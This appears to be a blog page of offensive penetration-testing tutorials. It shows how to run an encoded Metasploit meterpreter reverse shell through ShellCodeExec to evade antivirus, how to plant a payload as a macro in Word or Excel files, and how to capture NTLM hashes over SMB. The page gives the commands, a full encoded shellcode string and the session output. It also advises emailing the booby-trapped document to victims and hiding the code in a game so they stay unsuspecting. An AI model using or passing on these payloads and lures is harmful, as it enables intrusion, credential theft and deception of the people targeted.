A nice technical presentation from Chris Gates and from Rob Fuller which was published during DerbyCon 2011 event:
Showing posts with label PenTest. Show all posts
Showing posts with label PenTest. Show all posts
Friday, June 22, 2012
Execute Metasploit Payloads using ShellCodeExec
According to Damel Bernardo’s Blog, this is another good way to bypass any antivirus protection.
Let’s see how it works!
Features
- Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
- Can be compiled and works on 32-bit and 64-bit architectures.
- As far as I know, no AV detect it as malicious.
- Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
- It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
- Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
Example
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:
Code:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX [*] x86/alpha_mixed succeeded with size 634 (iteration=1) PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA
2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:
Code:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:
Code:
C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA
If you head back to the terminal where the multi/handler is running you will happily see:
Code:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E [*] Please wait while we load the module tree... [...] =[ metasploit v3.7.0-dev [core:3.7 api:1.0] + -- --=[ 673 exploits - 354 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12306 updated 7 days ago (2011.04.07) PAYLOAD => windows/meterpreter/reverse_tcp EXITFUNC => thread LPORT => 4444 LHOST => 192.168.136.1 [*] Started reverse handler on 192.168.136.1:4444 [*] Starting the payload handler... [*] Sending stage (749056 bytes) to 192.168.136.129 [*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011 meterpreter > sysinfo System Language : en_US OS : Windows .NET Server (Build 3790, Service Pack 2). Computer : W2K3R2 Architecture : x86 Meterpreter : x86/win32
The tool along with compilation files for POSIX and Windows systems can be found athttps://github.com/inquisb/shellcodeexec.
[source]
VBScript Infection Methods
Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well. It doesn’t necessarily need to be a Metasploit payload. This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through.
First things first, lets create our VBScript and set up a Metasploit listener.
Code:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 280 Options: LHOST=10.211.55.162,LPORT=8080,ENCODING=shikata_ga_nai root@bt4:/pentest/exploits/framework3# mv payload.exe tools/ root@bt4:/pentest/exploits/framework3# cd tools/ root@bt4:/pentest/exploits/framework3/tools# ruby exe2vba.rb payload.exe payload.vbs [*] Converted 14510 bytes of EXE into a VBA script root@bt4:/pentest/exploits/framework3/tools# cd.. root@bt4:/pentest/exploits/framework3# ./msfcli | grep multi/handler [*] Please wait while we load the module tree... exploit/multi/handler Generic Payload Handler root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler...
To recap everything we have performed up until now, we have created our payload using the shikata_ga_nai polymorphic encoder, turned it into an executable, had it connect back to us on port 8080 at host 10.211.55.162. We then convert our executable to VBScript using the “exe2vba.rb” script in the tools section. Once this is complete, you will need to get on a Windows machine that has Word on it and perform the following steps:
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “moo” and select “create”.
This will open up the visual basic editor. Paste the output of the payload.vbs file into the editor, save it and type some junk into the actual word doc itself. This is when you would perform the client-side attack by emailing this Word document to someone.
In order to keep user suspicion low, try embedding the code in one of the many Word/Excel games that are available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you some extra time to migrate to another process if you are using Meterpreter as a payload.
Here we give a generic name to the macro.
First, test out the document by opening it up, check back to where we have our Metasploit exploit/multi/handler listener:
Code:
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (205824 bytes) [*] Meterpreter session 1 opened (10.211.55.162:8080 -> 10.211.55.134:1696) meterpreter> execute -f cmd.exe -i Process 2152 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\rel1k>
Success! We have a Meterpreter shell right to the system that opened the document, and best of all, it doesn’t get picked up by anti-virus!!!
Note there are multiple methods to do this, you could also use the:
Code:
root@bt4:./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai Y > payload.exe
This will output the payload to a vbs script so follow the same steps as mentioned above. Something to mention is that macros are pretty much disabled by default in both home and corporate environments, so you would either have to entice them to enable macros or hope that they enable them to view the entire document properly. This is where having the script embedded in a document containing an embedded Flash game comes in handy.
[source]
NTLM Authentication Hijack using Metasploit
Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for smb pattern
Code:
msf > search smb
Step 2: Use SMB Auxiliary module to capture hashes
Code:
msf > use server/capture/smb msf auxiliary(smb) > show options sniff.. msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt msf auxiliary(smb) > set SRVHOST 192.168.1.252 msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
Code:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn’t exist).
Step 4: Switch to our machine and check if you’ve got the hashes captured
Code:
msf auxiliary(smb) > [*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to exit from msf console.
To display our captured hashes, change to /tmp directory:
Code:
root@bt:/pentest/exploits/framework3# cd /tmp root@bt:/tmp# cat captured_hashes.txt
Subscribe to:
Posts (Atom)